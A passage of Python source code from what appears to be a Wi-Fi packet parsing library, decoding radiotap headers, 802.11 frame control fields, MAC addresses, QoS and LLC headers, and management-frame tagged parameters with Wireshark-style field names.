:idx: int :return: int idx :return: int """ dbm_antsignal, = struct.unpack_from('<b', self._rtap, idx) return idx + 1, dbm_antsignal def strip_dbm_antnoise(self, idx): """strip(1 byte) radiotap.dbm_antnoise :idx: int :return: int idx :return: int """ dbm_antnoise, = struct.unpack_from('<b', self._rtap, idx) return idx + 1, dbm_antnoise def strip_lock_quality(self, idx): """strip(2 byte) lock quality :idx: int :return: int idx :return: int """ idx = Radiotap.align(idx, 2) lock_quality, = struct.unpack_from('<H', self._rtap, idx) return idx + 2, lock_quality def strip_tx_attenuation(self, idx): """strip(1 byte) tx_attenuation :idx: int :return: int idx :return: int """ idx = Radiotap.align(idx, 2) tx_attenuation, = struct.unpack_from('<H', self._rtap, idx) return idx + 2, tx_attenuation def strip_db_tx_attenuation(self, idx): """strip(1 byte) db_tx_attenuation :return: int idx :return: int """ idx = Radiotap.align(idx, 2) db_tx_attenuation, = struct.unpack_from('<H', self._rtap, idx) return idx + 2, db_tx_attenuation def strip_dbm_tx_power(self, idx): """strip(1 byte) dbm_tx_power :return: int idx :return: int """ idx = Radiotap.align(idx, 1) dbm_tx_power, = struct.unpack_from('<b', self._rtap, idx) return idx + 1, dbm_tx_power def strip_antenna(self, idx): """strip(1 byte) radiotap.antenna :return: int idx :return: int """ antenna, = struct.unpack_from('<B', self._rtap, idx) return idx + 1, antenna def strip_db_antsignal(self, idx): """strip(1 byte) radiotap.db_antsignal :return: int idx :return: int """ db_antsignal, = struct.unpack_from('<B', self._rtap, idx) return idx + 1, db_antsignal def strip_db_antnoise(self, idx): """strip(1 byte) radiotap.db_antnoise :return: int idx :return: int """ db_antnoise, = struct.unpack_from('<B', self._rtap, idx) return idx + 1, db_antnoise def strip_rx_flags(self, idx): """strip(2 byte) radiotap.rxflags :idx: int :return: int idx :return: collections.namedtuple """ rx_flags = collections.namedtuple('rx_flags', ['reserved', 'badplcp']) idx = Radiotap.align(idx, 2) flags, = struct.unpack_from('<H', self._rtap, idx) flag_bits = format(flags, '08b')[::-1] rx_flags.reserved = int(flag_bits[0]) rx_flags.badplcp = int(flag_bits[1]) return idx + 2, rx_flags def strip_tx_flags(self, idx): """strip(1 byte) tx_flags :idx: int :return: int idx :return: int """ idx = Radiotap.align(idx, 2) tx_flags, = struct.unpack_from('<B', self._rtap, idx) return idx + 1, tx_flags def strip_rts_retries(self, idx): """strip(1 byte) rts_retries :idx: int :return: int idx :return: int """ rts_retries, = struct.unpack_from('<B', self._rtap, idx) return idx + 1, rts_retries def strip_data_retries(self, idx): """strip(1 byte) data_retries :idx: int :return: int idx :return: int """ data_retries, = struct.unpack_from('<B', self._rtap, idx) return idx + 1, data_retries def strip_xchannel(self, idx): """strip(7 bytes) radiotap.xchannel.channel(1 byte), radiotap.xchannel.freq(2 bytes) and radiotap.xchannel.flags(4 bytes) :idx: int :return: int idx :return: collections.namedtuple """ xchannel = collections.namedtuple( 'xchannel', ['flags', 'freq', 'channel', 'max_power']) flags = collections.namedtuple( 'flags', ['turbo', 'cck', 'ofdm', 'two_g', 'five_g', 'passive', 'dynamic', 'gfsk', 'gsm', 'sturbo', 'hafl', 'quarter', 'ht_20', 'ht_40u', 'ht_40d']) idx = Radiotap.align(idx, 2) flag_val, freq, channel, max_power = struct.unpack_from('<lHBB', self._rtap, idx) xchannel.freq = freq xchannel.channel = channel xchannel.max_power = max_power bits = format(flag_val, '032b')[::-1] flags.turbo = int(bits[4]) flags.cck = int(bits[5]) flags.ofdm = int(bits[6]) flags.two_g = int(bits[7]) flags.five_g = int(bits[8]) flags.passive = int(bits[9]) flags.dynamic = int(bits[10]) flags.gfsk = int(bits[11]) flags.gsm = int(bits[12]) flags.sturbo = int(bits[13]) flags.half = int(bits[14]) flags.quarter = int(bits[15]) flags.ht_20 = int(bits[16]) flags.ht_40u = int(bits[17]) flags.ht_40d = int(bits[18]) xchannel.flags = flags return idx + 8, xchannel def strip_mcs(self, idx): """strip(3 byte) radiotap.mcs which contains 802.11n bandwidth, mcs(modulation and coding scheme) and stbc(space time block coding) information. :idx: int :return: int idx :return: collections.namedtuple """ mcs = collections.namedtuple( 'mcs', ['known', 'index', 'have_bw', 'have_mcs', 'have_gi', 'have_format', 'have_fec', 'have_stbc', 'have_ness', 'ness_bit1']) idx = Radiotap.align(idx, 1) known, flags, index = struct.unpack_from('<BBB', self._rtap, idx) bits = format(flags, '032b')[::-1] mcs.known = known # Known MCS information mcs.index = index # MCS index mcs.have_bw = int(bits[0]) # Bandwidth mcs.have_mcs = int(bits[1]) # MCS mcs.have_gi = int(bits[2]) # Guard Interval mcs.have_format = int(bits[3]) # Format mcs.have_fec = int(bits[4]) # FEC(Forward Error Correction) type mcs.have_stbc = int(bits[5]) # Space Time Block Coding mcs.have_ness = int(bits[6]) # Number of Extension Spatial Streams mcs.ness_bit1 = int(bits[7]) # Number of Extension Spatial Streams bit 1 return idx + 3, mcs def strip_ampdu(self, idx): """strip(8 byte) radiotap.ampdu :idx: int :return: int idx :return: collections.namedtuple """ ampdu = collections.namedtuple( 'ampdu', ['reference', 'crc_val', 'reservered', 'flags']) flags = collections.namedtuple( 'flags', ['report_zerolen', 'is_zerolen', 'lastknown', 'last', 'delim_crc_error']) idx = Radiotap.align(idx, 4) refnum, flag_vals, crc_val, reserved = struct.unpack_from('<LHBB', self._rtap, idx) ampdu.flags = flags ampdu.reference = refnum ampdu.crc_val = crc_val ampdu.reserved = reserved bits = format(flag_vals, '032b')[::-1] ampdu.flags.report_zerolen = int(bits[0]) ampdu.flags.is_zerolen = int(bits[1]) ampdu.flags.lastknown = int(bits[2]) ampdu.flags.last = int(bits[3]) ampdu.flags.delim_crc_error = int(bits[4]) return idx + 8, ampdu def strip_vht(self, idx): """strip(12 byte) radiotap.vht :idx: int :return: int idx :return: collections.namedtuple """ vht = collections.namedtuple( 'vht', ['known_bits', 'have_stbc', 'have_txop_ps', 'have_gi', 'have_sgi_nsym_da', 'have_ldpc_extra', 'have_beamformed', 'have_bw', 'have_gid', 'have_paid', 'stbc', 'txop_ps', 'gi', 'sgi_nysm_da', 'ldpc_extra', 'group_id', 'partial_id', 'beamformed', 'user_0', 'user_1', 'user_2', 'user_3']) user = collections.namedtuple('user', ['nss', 'mcs', 'coding']) idx = Radiotap.align(idx, 2) known, flags, bw = struct.unpack_from('<HBB', self._rtap, idx) mcs_nss_0, mcs_nss_1, mcs_nss_2, mcs_nss_3 = struct.unpack_from('<BBBB', self._rtap, idx + 4) coding, group_id, partial_id = struct.unpack_from('<BBH', self._rtap, idx + 8) known_bits = format(known, '032b')[::-1] vht.known_bits = known_bits vht.have_stbc = int(known_bits[0]) # Space Time Block Coding vht.have_txop_ps = int(known_bits[1]) # TXOP_PS_NOT_ALLOWD vht.have_gi = int(known_bits[2]) # Short/Long Guard Interval vht.have_sgi_nsym_da = int(known_bits[3]) # Short Guard Interval Nsym Disambiguation vht.have_ldpc_extra = int(known_bits[4]) # LDPC(Low Density Parity Check) vht.have_beamformed = int(known_bits[5]) # Beamformed vht.have_bw = int(known_bits[6]) # Bandwidth vht.have_gid = int(known_bits[7]) # Group ID vht.have_paid = int(known_bits[8]) # Partial AID flag_bits = format(flags, '032b')[::-1] vht.flag_bits = flag_bits vht.stbc = int(flag_bits[0]) vht.txop_ps = int(flag_bits[1]) vht.gi = int(flag_bits[2]) vht.sgi_nysm_da = int(flag_bits[3]) vht.ldpc_extra = int(flag_bits[4]) vht.beamformed = int(flag_bits[5]) vht.group_id = group_id vht.partial_id = partial_id vht.bw = bw vht.user_0 = user(None, None, None) vht.user_1 = user(None, None, None) vht.user_2 = user(None, None, None) vht.user_3 = user(None, None, None) for (i, mcs_nss) in enumerate([mcs_nss_0, mcs_nss_1, mcs_nss_2, mcs_nss_3]): if mcs_nss: nss = mcs_nss & 0xf0 >> 4 mcs = (mcs_nss & 0xf0) >> 4 coding = (coding & 2**i) >> i if i == 0: vht.user_0 = user(nss, mcs, coding) elif i == 1: vht.user_1 = user(nss, mcs, coding) elif i == 2: vht.user_2 = user(nss, mcs, coding) elif i == 3: vht.user_3 = user(nss, mcs, coding) return idx + 12, vht def extract_protocol(self): """extract 802.11 protocol from radiotap.channel.flags :return: str protocol name one of below in success [.11a, .11b, .11g, .11n, .11ac] None in fail """ if self.present.mcs: return '.11n' if self.present.vht: return '.11ac' if self.present.channel and hasattr(self, 'chan'): if self.chan.five_g: if self.chan.ofdm: return '.11a' elif self.chan.two_g: if self.chan.cck: return '.11b' elif self.chan.ofdm or self.chan.dynamic: return '.11g' return 'None' @staticmethod def align(val, align): """ :val: int :align: int :return: int """ return (val + align - 1) & ~(align - 1) class Wifi(ctypes.Structure): """Base Wi-Fi Packet""" _fields_ = [('name', ctypes.c_char_p), # name of packet ('vers', ctypes.c_ushort), # version ('category', ctypes.c_ushort), # category ('subtype', ctypes.c_ushort), # subtype ('ds', ctypes.c_char_p), # distribution system ('to_ds', ctypes.c_bool), # to distribution system -> wlan.fc.ds[0] ('from_ds', ctypes.c_bool), # from distribution system -> wlan.fc.ds[1] ('frag', ctypes.c_bool), # more flag ('retry', ctypes.c_bool), # retry ('power_mgmt', ctypes.c_bool), # power management ('order', ctypes.c_bool), # order ('wep', ctypes.c_bool), # wired equivalent privacy ('duration', ctypes.c_uint)] # duration # Wireshark syntax conjugates of fields in object (base) _shark_ = {'wlan.fc.version': 'vers', 'wlan.fc.type': 'category', 'wlan.fc.type_subtype': 'subtype', 'wlan.fc.ds': 'ds', 'wlan.fc.frag': 'frag', 'wlan.fc.retry': 'retry', 'wlan.fc.pwrmgt': 'power_mgmt', 'wlan.fc.wep': 'wep', 'wlan.fc.order': 'order', 'wlan.duration': 'duration'} def __init__(self, frame, no_rtap=False): """Constructor method. Parse common headers of all Wi-Fi frames. :frame: ctypes.Structure """ super(Wifi, self).__init__() self._raw = {} if not no_rtap: rtap_bytes, self._packet = WiHelper._strip_rtap(frame) self.radiotap = Radiotap(rtap_bytes) else: self._packet = frame self.radiotap = None f_cntrl = struct.unpack('BB', self._packet[:2]) # frame control flags = f_cntrl[1] self.vers = f_cntrl[0] & 0b0011 self.category = (f_cntrl[0] >> 2) & 0b0011 self.subtype = f_cntrl[0] >> 4 flag_bits = format(flags, '08b')[::-1] self.to_ds = int(flag_bits[0]) self.from_ds = int(flag_bits[1]) self.ds = b''.join([(flag_bits[0]).encode('ascii'), (flag_bits[1]).encode('ascii')]) self.frag = int(flag_bits[2]) self.retry = int(flag_bits[3]) self.power_mgmt = int(flag_bits[4]) self.more_data = int(flag_bits[5]) self.wep = int(flag_bits[6]) self.order = int(flag_bits[7]) # TODO: parse duration with respect to field/subfield # since some bits might be reserved for types like data (0x20) # https://community.arubanetworks.com/t5/Technology-Blog/802-11-Duration-ID-Field/ba-p/235872 self.duration = struct.unpack('H', self._packet[2:4])[0] # us self.name = None if self.category == 0: if self.subtype in _SUBTYPES_[0].keys(): self.name = _SUBTYPES_[0][self.subtype].encode('ascii') elif self.category == 1: if self.subtype in _SUBTYPES_[1].keys(): self.name = _SUBTYPES_[1][self.subtype].encode('ascii') elif self.category == 2: if self.subtype in _SUBTYPES_[2].keys(): self.name = _SUBTYPES_[2][self.subtype].encode('ascii') def get_shark_field(self, fields): """get parameters via wireshark syntax. out = x.get_shark_field('wlan.fc.type') out = x.get_shark_field(['wlan.fc.type', 'wlan.seq']) :fields: str or str[] :return: dict out[fields[0]] = val[0] or None out[fields[1]] = val[1] or None ... """ keys, exist, out = None, {}, None if isinstance(fields, str): fields = [fields] elif not isinstance(fields, list): logging.error('invalid input type') return None out = dict.fromkeys(fields) if hasattr(self, '_shark_'): exist.update(self._shark_) if hasattr(self, '_s_shark_'): exist.update(self._s_shark_) if hasattr(self.radiotap, '_r_shark_'): exist.update(self.radiotap._r_shark_) keys = exist.keys() for elem in fields: if elem in keys: obj_field, tmp = exist[elem], None try: tmp = operator.attrgetter(obj_field)(self) except AttributeError: tmp = None if not tmp: try: tmp = operator.attrgetter(obj_field)(self.radiotap) except AttributeError: tmp = None out[elem] = tmp return out @staticmethod def get_mac_addr(mac_addr): """converts bytes to mac addr format :mac_addr: ctypes.structure :return: str mac addr in format 11:22:33:aa:bb:cc """ mac_addr = bytearray(mac_addr) mac = b':'.join([('%02x' % o).encode('ascii') for o in mac_addr]) return mac def get_hex_repr(self): """wlan.fc.type_subtype hex representation :return: str """ return hex(self.category * 16 + self.subtype) def strip_mac_addrs(self): """strip mac address(each 6 byte) information. (wlan.ta, wlan.ra, wlan.sa, wlan.da) (transmitter, receiver, source, destination) :return: int index of sequence control :return: int index after mac addresses :return: str source address (sa) :return: str transmitter address (ta) :return: str receiver address (ra) :return: str destination address (da) :return: str basic service sed identifier (bssid) """ qos_idx, seq_idx = 0, 0 sa, ta, ra, da, bssid = None, None, None, None, None if self.to_ds == 1 and self.from_ds == 1: (ra, ta, da) = struct.unpack('!6s6s6s', self._packet[4:22]) sa = struct.unpack('!6s', self._packet[24:30])[0] qos_idx = 30 seq_idx = 22 elif self.to_ds == 0 and self.from_ds == 1: (ra, ta, sa) = struct.unpack('!6s6s6s', self._packet[4:22]) qos_idx = 24 seq_idx = 22 elif self.to_ds == 1 and self.from_ds == 0: (ra, ta, da) = struct.unpack('!6s6s6s', self._packet[4:22]) qos_idx = 24 seq_idx = 22 elif self.to_ds == 0 and self.from_ds == 0: (ra, ta, bssid) = struct.unpack('!6s6s6s', self._packet[4:22]) qos_idx = 24 seq_idx = 22 if ta is not None: ta = Wifi.get_mac_addr(ta) if ra is not None: ra = Wifi.get_mac_addr(ra) if sa is not None: sa = Wifi.get_mac_addr(sa) if da is not None: da = Wifi.get_mac_addr(da) if bssid is not None: bssid = Wifi.get_mac_addr(bssid) return seq_idx, qos_idx, sa, ta, ra, da, bssid def strip_seq_cntrl(self, idx): """strip(2 byte) wlan.seq(12 bit) and wlan.fram(4 bit) number information. :seq_cntrl: ctypes.Structure :return: int sequence number :return: int fragment number """ seq_cntrl = struct.unpack('H', self._packet[idx:idx + 2])[0] seq_num = seq_cntrl >> 4 frag_num = seq_cntrl & 0x000f return seq_num, frag_num def __repr__(self, show_rfields=True): """ :show_rfields: bool whether to show radiotap fields too. """ out_str = '' all_fields = [] if hasattr(self, '_fields_'): all_fields += self._fields_ if hasattr(self, '_sfields_'): all_fields += self._sfields_ if all_fields: for elem in all_fields: key = elem[0] try: val = operator.attrgetter(key)(self) except Exception: val = None if isinstance(val, list): if val: out_str += "{} <list>[{}]\n".format(key, type(val[0])) else: out_str += "{} <list>\n".format(str(key)) else: out_str += "{}: {}\n".format(str(key), str(val)) else: logging.error('instance does not have any field') return None if show_rfields and hasattr(self.radiotap, '_rfields_'): for elem in self.radiotap._rfields_: key = elem[0] try: val = operator.attrgetter(key)(self.radiotap) except Exception: val = None if val is not None: out_str += "radiotap.{}: {}\n".format(key, val) return out_str class Data(Wifi): """Base Data Packet (type: 2)""" def __init__(self, frame, no_rtap=False): """Constructor method. :packet: ctypes.Structure :no_rtap: Bool shall parse radiotap headers """ Wifi.__init__(self, frame, no_rtap) class QosData(Data): """Qos Data (type: 2, subtype: 8)""" _sfields_ = [('sa', ctypes.c_char_p), # source address ('ta', ctypes.c_char_p), # transmitter address ('ra', ctypes.c_char_p), # receiver address ('da', ctypes.c_char_p), # destionation address ('seq_num', ctypes.c_uint), # sequence number ('frag_num', ctypes.c_uint), # fragment number ('qos_pri', ctypes.c_uint), # qualit of service priority ('qos_bit', ctypes.c_bool), # quality of service bit ('qos_ack', ctypes.c_uint), # quality of service ack ('amsdupresent', ctypes.c_bool), # aggregated mac service data unit ('ccmp_extiv', ctypes.c_uint64), # counter mode chiper block ('payload', list)] # payload # Wireshark syntax conjugates of fields in object (subfield shark) _s_shark_ = {'wlan.sa': 'sa', 'wlan.ta': 'ta', 'wlan.ra': 'ra', 'wlan.da': 'da', 'wlan.seq': 'seq_num', 'wlan.frag': 'frag_num', 'wlan.qos.priority': 'qos_pri', 'wlan.qos.bit4': 'qos_bit', 'wlan.qos.ack': 'qos_ack', 'wlan.qos.amsdupresent': 'amsdupresent', 'wlan.ccmp.extiv': 'ccmp_extiv'} def __init__(self, frame, no_rtap=False, parse_amsdu=True): """Constructor method. :frame: ctypes.Structure :parse_amsdu: Bool shall parse aggregated mac service data unit """ Data.__init__(self, frame, no_rtap) idx = 0 self.sa = self.ta = self.ra = self.da = None self.seq_num = self.frag_num = None self.qos_pri = self.qos_bit = self.qos_ack = None self.ccmp_extiv = None self.payload = [] seq_idx, qos_idx, self.sa, self.ta, self.ra, self.da, _ = self.strip_mac_addrs() self.seq_num, self.frag_num = self.strip_seq_cntrl(seq_idx) idx = qos_idx incr, self.qos_pri, self.qos_bit, self.qos_ack, self.amsdupresent =\ self.strip_qos_cntrl(idx, self.radiotap.prot_type) idx += incr if self.wep == 1: incr, self.ccmp_extiv = self.strip_ccmp(idx) idx += incr if parse_amsdu: if self.amsdupresent != 0 and self.wep == 0: while idx < len(self._packet): msdu, offset = self.strip_msdu(idx) self.payload.append(msdu) idx += offset else: if self.wep == 0: msdu = {} offset, llc = self.strip_llc(idx) msdu['llc'] = llc msdu['payload'] = self._packet[idx + offset:] self.payload.append(msdu) else: self.payload.append({'payload': self._packet[idx:]}) def strip_qos_cntrl(self, idx, prot_type): """strip(2 byte) wlan.qos :idx: int :prot_type: string 802.11 protocol type(.11ac, .11a, .11n, etc) :return: int number of processed bytes :return: int qos priority :return: int qos bit :return: int qos acknowledgement :return: int amsdupresent(aggregated mac service data unit) """ qos_cntrl, = struct.unpack('H', self._packet[idx:idx + 2]) qos_cntrl_bits = format(qos_cntrl, '016b')[::-1] qos_pri = qos_cntrl & 0x000f qos_bit = int(qos_cntrl_bits[5]) qos_ack = int(qos_cntrl_bits[6:8], 2) amsdupresent = 0 if prot_type == '.11ac': amsdupresent = int(qos_cntrl_bits[7]) return 2, qos_pri, qos_bit, qos_ack, amsdupresent def strip_ccmp(self, idx): """strip(8 byte) wlan.ccmp.extiv CCMP Extended Initialization Vector :return: int number of processed bytes :return: ctypes.raw ccmp vector """ ccmp_extiv = None if len(self._packet[idx:]) >= 8: raw_bytes = self._packet[idx:idx + 8] ccmp_extiv, = struct.unpack_from('Q', raw_bytes, 0) return 8, ccmp_extiv def strip_msdu(self, idx): """strip single mac servis data unit(msdu) see -> https://mrncciew.com/2014/11/01/cwap-802-11-data-frame-aggregation/ :idx: int :return: dict msdu :return: int number of processed bytes """ # length of msdu payload has to be multiple of 4, # this guaranteed with padding padding = 0 len_payload = 0 msdu = { 'llc': {}, 'wlan.da': None, 'wlan.sa': None, 'payload': None, 'length': 0 } (da_mac, sa_mac) = struct.unpack('!6s6s', self._packet[idx:idx + 12]) msdu['wlan.da'] = Wifi.get_mac_addr(da_mac) msdu['wlan.sa'] = Wifi.get_mac_addr(sa_mac) idx += 12 msdu['length'] = struct.unpack('!H', self._packet[idx:idx + 2])[0] idx += 2 offset, msdu['llc'] = self.strip_llc(idx) idx += offset len_payload = msdu['length'] - offset msdu['payload'] = self._packet[idx:idx + len_payload] padding = 4 - (len_payload % 4) return msdu, msdu['length'] + padding + 12 def strip_llc(self, idx): """strip(4 or 8 byte) logical link control headers :return: int number of processed bytes :return: dict llc information see -> http://www.wildpackets.com/resources/compendium/ethernet/frame_snap_iee8023 ABBRVS. ssap: source service access point dsap: destination service access point SNAP(Subnetwork Acess Protocol) """ llc = {} snap = 170 llc_dsap = struct.unpack('B', self._packet[idx:idx + 1])[0] llc['dsap.dsap'] = llc_dsap >> 1 llc['dsap.ig'] = llc_dsap & 0b01 idx += 1 llc_ssap = struct.unpack('B', self._packet[idx:idx + 1])[0] llc['ssap.sap'] = llc_ssap >> 1 llc['ssap.cr'] = llc_ssap & 0b01 idx += 1 if llc_dsap == snap and llc_ssap == snap: llc_control = struct.unpack('B', self._packet[idx:idx + 1])[0] llc['control.u_modifier_cmd'] = llc_control >> 2 llc['control.ftype'] = llc_control & 0x03 idx += 1 llc['organization_code'] = self._packet[idx:idx + 3] idx += 3 llc['type'] = self._packet[idx:idx + 2] return 8, llc else: return 4, llc def __str__(self): frame = "%s (sa: %s, ta: %s, ra: %s, da: %s, ds: %s, seq: %s)" frame = frame % (self.name, self.sa, self.ta, self.ra, self.da, self.ds, self.seq_num) return frame class Management(Wifi): """Management Packet (type: 0)""" # commonly exists in some of the subtypes _capabilities_ = [('ess', ctypes.c_bool), # extended service set ('ibss', ctypes.c_bool), # indepent service set ('priv', ctypes.c_bool), # privacy ('short_pre', ctypes.c_bool), # short preamble ('pbcc', ctypes.c_bool), # packet binary convolutional code ('chan_agility', ctypes.c_bool), # channel agility ('spec_man', ctypes.c_bool), # spectrum management ('short_slot', ctypes.c_bool), # short slot time ('apsd', ctypes.c_bool), # automatic power save delivery ('radio_meas', ctypes.c_bool), # radio measurement ('dss_ofdm', ctypes.c_bool), # direct spread spectrum ('del_back', ctypes.c_bool), # delayed block acknowledgement ('imm_back', ctypes.c_bool)] # immediate block acknowledgement _scapabilities_ = {'wlan_mgt.fixed.capabilities.ess': 'ess', 'wlan_mgt.fixed.capabilities.ibss': 'ibss', 'wlan_mgt.fixed.capabilities.priv': 'priv', 'wlan_mgt.fixed.capabilities.preamble': 'short_pre', 'wlan_mgt.fixed.capabilities.pbcc': 'pbcc', 'wlan_mgt.fixed.capabilities.agility': 'chan_agility', 'wlan_mgt.fixed.capabilities.spec_man': 'spec_man', 'wlan_mgt.fixed.capabilities.short_slot_time': 'short_slot', 'wlan_mgt.fixed.capabilities.apsd': 'apsd', 'wlan_mgt.fixed.capabilities.radio_measurement': 'radio_meas', 'wlan_mgt.fixed.capabilities.dss_ofdm': 'dss_ofdm', 'wlan_mgt.fixed.capabilities.del_blk_ack': 'del_back', 'wlan_mgt.fixed_capabilities.imm_blk_ack': 'imm_back'} def __init__(self, frame, no_rtap=False): """Constructor Method :frame: ctypes.Structure :subtype: int """ Wifi.__init__(self, frame, no_rtap) self.tagged_params = [] self._raw_tagged_params = None self.timestamp = None self.interval = None self.fixed_capabils = None def __str__(self): return self.name @staticmethod def parse_tagged_params(raw_tagged_params): """strip tagged information elements wlan_mgt.tag which has generic type-length-value structure [type, length, value] type(1 byte), length(1 byte), value(varies) [wlan_mgt.tag.number, wlan_mgt.tag.length, payload] structured fields. :return: dict[] list of tagged params :return: int 0 in succ, 1 for """ fcs_len = 4 # wlan.fcs (4 bytes) idx = 0 tagged_params = [] while idx < len(raw_tagged_params) - fcs_len: tag_num, tag_len = struct.unpack('BB', raw_tagged_params[idx:idx + 2]) idx += 2 if len(raw_tagged_params) >= idx + tag_len: param = {} param['number'], param['length'] = tag_num, tag_len payload = raw_tagged_params[idx:idx + tag_len] if tag_num in MNGMT_TAGS: param['name'] = MNGMT_TAGS[tag_num] if MNGMT_TAGS[tag_num] == 'TAG_VENDOR_SPECIFIC_IE': param['payload'] = Management.parse_vendor_ie(payload) else: param['payload'] = payload else: param['name'] = None tagged_params.append(param) idx += tag_len else: logging.warning('out tag length header points out of boundary') log_msg = 'index: {p_idx}, pack_len: {p_len}' log_msg = log_msg.format(p_idx=idx + tag_len, p_len=len(raw_tagged_params)) logging.warning(log_msg) return 1, tagged_params return 0, tagged_params @staticmethod def get_fixed_capabils(payload): """strip(2 byte) wlan_mgt.fixed.capabilities :payload: ctypes.structure 2 byte :return: dict None in error """ if len(payload) != 2: return None capabils = {} fix_cap = struct.unpack('H', payload)[0] cap_bits = format(fix_cap, '016b')[::-1] capabils['ess'] = int(cap_bits[0]) # Extended Service Set capabils['ibss'] = int(cap_bits[1]) # Independent Basic Service Set capabils['priv'] = int(cap_bits[4]) # Privacy capabils['short_preamble'] = int(cap_bits[5]) # Short Preamble capabils['pbcc'] = int(cap_bits[6]) # Packet Binary Convolutional Code capabils['chan_agility'] = int(cap_bits[7]) # Channel Agility capabils['spec_man'] = int(cap_bits[8]) # Spectrum Management capabils['short_slot'] = int(cap_bits[10]) # Short Slot Time capabils['apsd'] = int(cap_bits[11]) # Automatic Power Save Delivery capabils['radio_meas'] = int(cap_bits[12]) # Radio Measurement capabils['dss_ofdm'] = int(cap_bits[13]) # Direct Spread Spectrum capabils['del_back'] = int(cap_bits[14]) # Delayed Block Acknowledgement capabils['imm_back'] = int(cap_bits[15]) # Immediate Block Acknowledgement return capabils @staticmethod def parse_vendor_ie(payload): """parse vendor specific information element oui -> organizationally unique identifier first 3 bytes of mac addresses see:https://www.wireshark.org/tools/oui-lookup.html strip wlan_mgt.tag.oui(3 bytes), wlan_mgt.tag.vendor.oui.type(1 byte) wlan_mgt.tag.vendor.data (varies) :payload: ctypes.structure :return: dict {'oui':00-11-22, 'oui_type':1, 'oui_data':ctypes.structure} """ output = {} oui = struct.unpack('BBB', payload[0:3]) oui = b'-'.join([('%02x' % o).encode('ascii') for o in oui]) oui_type = struct.unpack('B', payload[3:4])[0] oui_data = payload[4:] output['oui'] = oui.upper() output['oui_type'] = oui_type output['oui_data'] = oui_data return output @staticmethod def get_timestamp(payload): """strip wlan_mgt.fixed.timestamp(8 bytes) :payload: ctypes.structure :return: int None on error """ if len(payload) != 8: return None timestamp = struct.unpack('Q', payload)[0] return timestamp @staticmethod def get_interval(payload): """strip wlan_mgt.fixed.beacoN(2 bytes) beacon interval :payload: ctypes.structure :return: int None on error """ if len(payload) != 2: return None interval = struct.unpack('H', payload)[0] return interval @staticmethod def strip_fixed_params(payload): """strip(12 byte) wlan_mgt.fixed.all :payload: ctypes.structure :return: int timestamp :return: int beacon interval :return: dict capabilities """ if len(payload) != 12: return None, None, None idx = 0 timestamp = Management.get_timestamp(payload[idx:idx + 8]) idx += 8 interval = Management.get_interval(payload[idx:idx + 2]) idx += 2 capabils = Management.get_fixed_capabils(payload[idx:idx + 2]) return timestamp, interval, capabils @staticmethod def is_valid_mac_oui(mac_block): """checks whether mac block is in format of 00-11-22 or 00:11:22. :return: int """ if len(mac_block) != 8: return 0 if ':' in mac_block: if len(mac_block.split(':')) != 3: return 0 elif '-' in mac_block: if len(mac_block.split('-')) != 3: return 0 return 1 def set_fixed_capabils(self, capabils): """set keys of capabils into fields of object :capabils: dict """ self.ess = capabils['ess'] self.ibss = capabils['ibss'] self.priv = capabils['priv'] self.short_preamble = capabils['short_preamble'] self.pbcc = capabils['pbcc'] self.chan_agility = capabils['chan_agility'] self.spec_man = capabils['spec_man'] self.short_slot = capabils['short_slot'] self.apsd = capabils['apsd'] self.radio_meas = capabils['radio_meas'] self.dss_ofdm = capabils['dss_ofdm'] self.del_back = capabils['del_back'] self.imm_back = capabils['imm_back'] def get_vendor_ies(self, mac_block=None, oui_type=None): """vendor information element querying :mac_block: str first 3 bytes of mac addresses in format of 00-11-22 or 00:11:22 or 001122 :oui_type: int vendors ie type :return: int is valid mac_block format -1 is unknown :return: dict[] list of oui information elements -1 on error (invalid v """ vendor_ies = [] if mac_block is not None: if Management.is_valid_mac_oui(mac_block): mac_block = mac_block.upper() if ':' in mac_block: mac_block.replace(':', '-') else: logging.warning("invalid oui macblock") return None for elem in self.tagged_params: tag_num = elem['number'] if MNGMT_TAGS[tag_num] == 'TAG_VENDOR_SPECIFIC_IE': if mac_block is None: vendor_ies.append(elem) elif elem['payload']['oui'] == mac_block.encode('ascii'): if oui_type is None: vendor_ies.append(elem) elif elem['payload']['oui_type'] == oui_type: vendor_ies.append(elem) return vendor_ies class ProbeResp(Management): """Probe Response (type: 0, subtype: 5)""" _sfields_ = [('ra', ctypes.c_char_p), # receiver address ('ta', ctypes.c_char_p), # transmitter address ('bssid', ctypes.c_char_p), # basic service set identifier ('frag_num', ctypes.c_uint), # fragment number ('seq_num', ctypes.c_uint), # sequence number ('timestamp', ctypes.c_uint64), # timestamp ('interval', ctypes.c_uint), # interval ('tagged_params', list)] # tagged parameters # Wireshark syntax conjugates of fields in object (subfield shark) _s_shark_ = {'wlan.ta': 'ta', 'wlan.ra': 'ra', 'wlan.bssid': 'bssid', 'wlan.frag': 'frag_num', 'wlan.seq': 'seq_num', 'wlan_mgt.fixed.timestamp': 'timestamp', 'wlan_mgt.fixed.beacon': 'interval', 'wlan_mgt.tagged.all': 'tagged_params'} _sfields_ += Management._capabilities_ _s_shark_.update(Management._scapabilities_) def __init__(self, frame, no_rtap=False): """ """ Management.__init__(self, frame, no_rtap) idx = 0 self.ta = self.ra = self.bssid = None self.seq_num = self.frag_num = None self.timestamp = self.interval = None # fixed capability fields self.ess = self.ibss = None self.privacy = None self.priv = self.short_pre = self.pbcc = self.chan_agility = None self.spec_man = self.short_slot = self.apsd = self.radio_meas = None self.dss_ofdm = self.del_back = self.imm_back = None seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs() idx = seq_idx self.seq_num, self.frag_num = self.strip_seq_cntrl(idx) idx += 2 payload = self._packet[idx:idx + 12] timestamp, interval, fixed_capabils = self.strip_fixed_params(payload) if all([timestamp, interval, fixed_capabils]): self.timestamp = timestamp self.interval = interval self.set_fixed_capabils(fixed_capabils) idx += 12 else: logging.error("failed to parse fixed parameters") return if idx < len(self._packet): self._raw_tagged_params = self._packet[idx:] is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params) if len(tagged_params): self.tagged_params = tagged_params if is_out_bound: logging.error("tag_len header not matched with raw byte counts") class ProbeReq(Management): """Probe Request (type: 0, subtype:4)""" _sfields_ = [('ra', ctypes.c_char_p), # receiver address ('ta', ctypes.c_char_p), # transmitter address ('bssid', ctypes.c_char_p), # basic service set identifier ('frag_num', ctypes.c_uint), # fragment number ('seq_num', ctypes.c_uint), # sequence number ('tagged_params', list)] # tagged parameters _s_shark_ = {'wlan.ra': 'ra', 'wlan.ta': 'ta', 'wlan.bssid': 'bssid', 'wlan.frag': 'frag_num', 'wlan.seq': 'seq_num', 'wlan_mgt.tagged.all': 